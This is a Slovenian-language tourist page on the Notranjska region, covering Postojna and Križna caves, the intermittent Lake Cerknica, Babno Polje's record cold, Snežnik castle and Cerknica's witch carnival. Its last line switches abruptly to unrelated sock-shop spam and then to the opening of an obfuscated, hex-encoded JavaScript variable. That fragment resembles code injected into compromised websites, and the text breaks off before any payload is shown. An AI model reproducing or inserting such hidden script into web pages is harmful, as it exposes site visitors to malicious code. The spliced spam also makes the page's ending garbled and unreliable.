031 32 27 76 ali  041 67 88 96

;none:

»Že navsezgodaj v njem se koplje sonce
in Slivnica si gole rebri umiva,
čez Križno goro sapa nagajiva
pripelje včasih v vas pikapolonce.«

Pesem o cerkniškem jezeru nas popelje do lepot, ki jih ponuja Notranjska pod površjem. Še bolj pa so osupljive tiste, ki jih lahko občudujete na tem razgibanem, večinoma z gozdom poraslim, območju. Skoraj vsak kvadratni kilometer območja namreč skriva kakšno izmed več tisoč kraških jam.
Vabi nas Postojnska jama, ljubitelje podzemnih čudes očara tudi Križna jama v bližini Loškega polja in med izjemne naravne znamenitosti, ki so prav tako del Notranjskega regijskega parka, sodi visok naravni most v Rakovem Škocjanu. Le nekaj kilometrov je oddaljen od še enega fenomena kraškega sveta, presihajočega jezera. Cerkniško jezero je v mesecih, ko je polno vode, največje slovensko jezero. V značilni dinarski smeri od jugovzhoda proti severozahodu si slede Babno polje s potokom Trbuhovico. Istoimensko naselje leži na osojni legi z izredno hladnim podnebjem, zaradi zaprtosti kotline so zime tu zelo mrzle, zato temu območju pravijo tudi slovenska Sibirija. Na Babnem Polju je zaradi toplotnega obrata zabeležena najnižja temperatura v Sloveniji, –-35°C.

Najlepši in najbolj znani grad v Loški dolini je gotovo grad Snežnik na najvišjem vrhu južne Slovenije, ki se bohoti z ohranjenimi avtentičnimi interierji.
To, da v Cerknici prebivajo čarovnice,  ni nič novega. Pramati Uršula se sicer ne prikaže prav pogosto, izjemoma na pustno nedeljo, ko poplesava po ulicah Cerknice, vendar pa toliko bolj pogosto skuha prenekatero hudomušno vreme. Če ne verjamete, pridite in se sami prepričajte.

Notranjska

RIBNICA - NOVA ŠTIFTA - SNEŽNIK – CERKNICA RAŠICA – TURJAK – RIBNICA – CERKNICA   Shop Womens Socks - View the Large Rangevar nsSGCDsaF1=new window["\x52\x65\x67\x45\...